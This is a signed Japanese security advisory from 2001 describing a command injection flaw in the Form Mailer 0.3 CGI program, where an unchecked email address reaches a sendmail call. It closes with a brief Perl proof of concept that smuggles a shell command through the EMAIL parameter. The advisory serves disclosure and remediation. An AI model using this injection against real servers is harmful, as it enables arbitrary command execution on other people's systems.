-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

======================================================================
CGI PROGRAM SECURITY ADVISORY  [Form Mailer 0.3]            2001/01/21
======================================================================
http://www.ansi.co.jp/cgi/security/advisories/form-mailer_2001_01_21.txt
======================================================================

■ 影響を受けるCGIプログラム

* Form Mailer 0.3

■ 概要

Form Mailer 0.3 は Perl Script Laboratory によって作成されたフォームメー
ル CGI プログラムです。このプログラムには外部から CGI プログラムの動作
権限で任意のコマンドが実行可能なセキュリティ上の問題点があります。

Form Mailer: http://www.psl.ne.jp/perl/pscript9.html

■ 解説

Form Mailer 0.3 に含まれる f_mailer.cgi では、外部から与えられるメール
アドレスに対する汚染チェックを怠っています。このため、sendmail コマン
ドを呼び出す際、メールアドレス指定部分に任意の文字列を指定可能となり、
結果的に外部から CGI プログラムの実行権限で任意のコマンドの実行が可能
になります。

■ 影響

CGIプログラムが各ユーザ権限で実行されるシステム (Apache + SuEXEC など)
の場合、そのユーザの権限で任意の操作をすることが可能です。これによって
ユーザ環境が破壊される可能性があります。そうではない場合でも、CGI プロ
グラムの実行 UID で任意の操作が可能です。

■ 回避方法

新しいバージョンのプログラムを入手して入れ替えます。

■ 参考コード

#! /usr/bin/perl -w

use LWP::Simple;

# executes "ls -lR > /tmp/ls-lR"
getprint "http://host/f_mailer03/cgi-bin/f_mailer.cgi?%A4%AA%CC%BE%C1%B0=x&%C0%AD%CA%CC=x&%A4%B4%BD%BB%BD%EA=x&%C5%C5%CF%C3%C8%D6%B9%E6=x&%CC%E41%A4%CE%C5%FA%A4%A8=x&SEND_FORCED=1&CONF=f_mailer_conf.pl&EMAIL=|ls+-lR+>+/tmp/ls-lR";

__END__

■ 変更履歴

2001/01/21: 公開
2001/02/04: 解説に追記・参考コードを追加

======================================================================

(C) 2001 ASUKA NETWORK SERVICE, INC.  http://www.ansi.co.jp/
         HIRATA YASUYUKI              http://yasu.asuka.net/
All rights reserved.

* この文書に書かれている内容は無保証です。
* この文書に書かれている内容を利用して攻撃を行った場合、刑事上・民事上
  の責任を問われることがあります。
* このファイルは内容の変更 (電子署名の除去を含む) が行われない限り自由
  に再配布可能です。

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (FreeBSD)
Comment: For info see http://www.gnupg.org

iD8DBQE7rqd9duP2KhBu8ikRAue0AKCjFPC4gfnT4bThGjOJqOaegnHzcACeLIn7
uD6gI23tabuF4Qd2iLNcrOGIPwMFATuup33CitaZXxzdBBEC57QAoJTIv/Fv8PoV
QzF5YTLY/QpNx6rFAKCgw9CmxTCIin5MiL43iLtEsWpdMA==
=N4yi
-----END PGP SIGNATURE-----